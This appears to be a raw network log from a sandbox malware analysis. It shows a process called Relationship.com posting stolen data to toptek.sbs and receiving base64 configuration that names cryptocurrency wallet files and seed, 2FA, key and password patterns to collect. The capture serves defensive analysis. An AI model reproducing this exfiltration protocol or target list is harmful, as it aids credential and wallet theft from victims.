                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:48:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          22192.168.2.44981194.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----Z5PPP8Q1NYCBIE3EUKXL
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 6990993
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 35 50 50 50 38 51 31 4e 59 43 42 49 45 33 45 55 4b 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 50 50 38 51 31 4e 59 43 42 49 45 33 45 55 4b 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 50 50 38 51 31 4e 59 43 42 49 45 33 45 55 4b 58 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------Z5PPP8Q1NYCBIE3EUKXLContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------Z5PPP8Q1NYCBIE3EUKXLContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Z5PPP8Q1NYCBIE3EUKXLCont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:48:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:20 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          23192.168.2.44981294.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:48:15 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8QQ9HVKF37QIE3EUKXLF
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:15 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 38 51 51 39 48 56 4b 46 33 37 51 49 45 33 45 55 4b 58 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 51 39 48 56 4b 46 33 37 51 49 45 33 45 55 4b 58 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 38 51 51 39 48 56 4b 46 33 37 51 49 45 33 45 55 4b 58 4c 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------8QQ9HVKF37QIE3EUKXLFContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------8QQ9HVKF37QIE3EUKXLFContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------8QQ9HVKF37QIE3EUKXLFCont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:16 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:48:16 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                          Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          24192.168.2.44982194.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:48:17 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KN7Y5FUK6F37YU3OPHVS
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:17 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4e 37 59 35 46 55 4b 36 46 33 37 59 55 33 4f 50 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 37 59 35 46 55 4b 36 46 33 37 59 55 33 4f 50 48 56 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 4e 37 59 35 46 55 4b 36 46 33 37 59 55 33 4f 50 48 56 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------KN7Y5FUK6F37YU3OPHVSContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------KN7Y5FUK6F37YU3OPHVSContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------KN7Y5FUK6F37YU3OPHVSCont
                                                                                                                                                                                                                                                                          2024-12-22 21:48:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:18 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:48:18 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                          Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          25192.168.2.44982994.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:48:20 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----JE3OPZM79H47QI589ZCB
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 453
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:20 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 5a 4d 37 39 48 34 37 51 49 35 38 39 5a 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 5a 4d 37 39 48 34 37 51 49 35 38 39 5a 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 5a 4d 37 39 48 34 37 51 49 35 38 39 5a 43 42 0d 0a 43 6f 6e 74
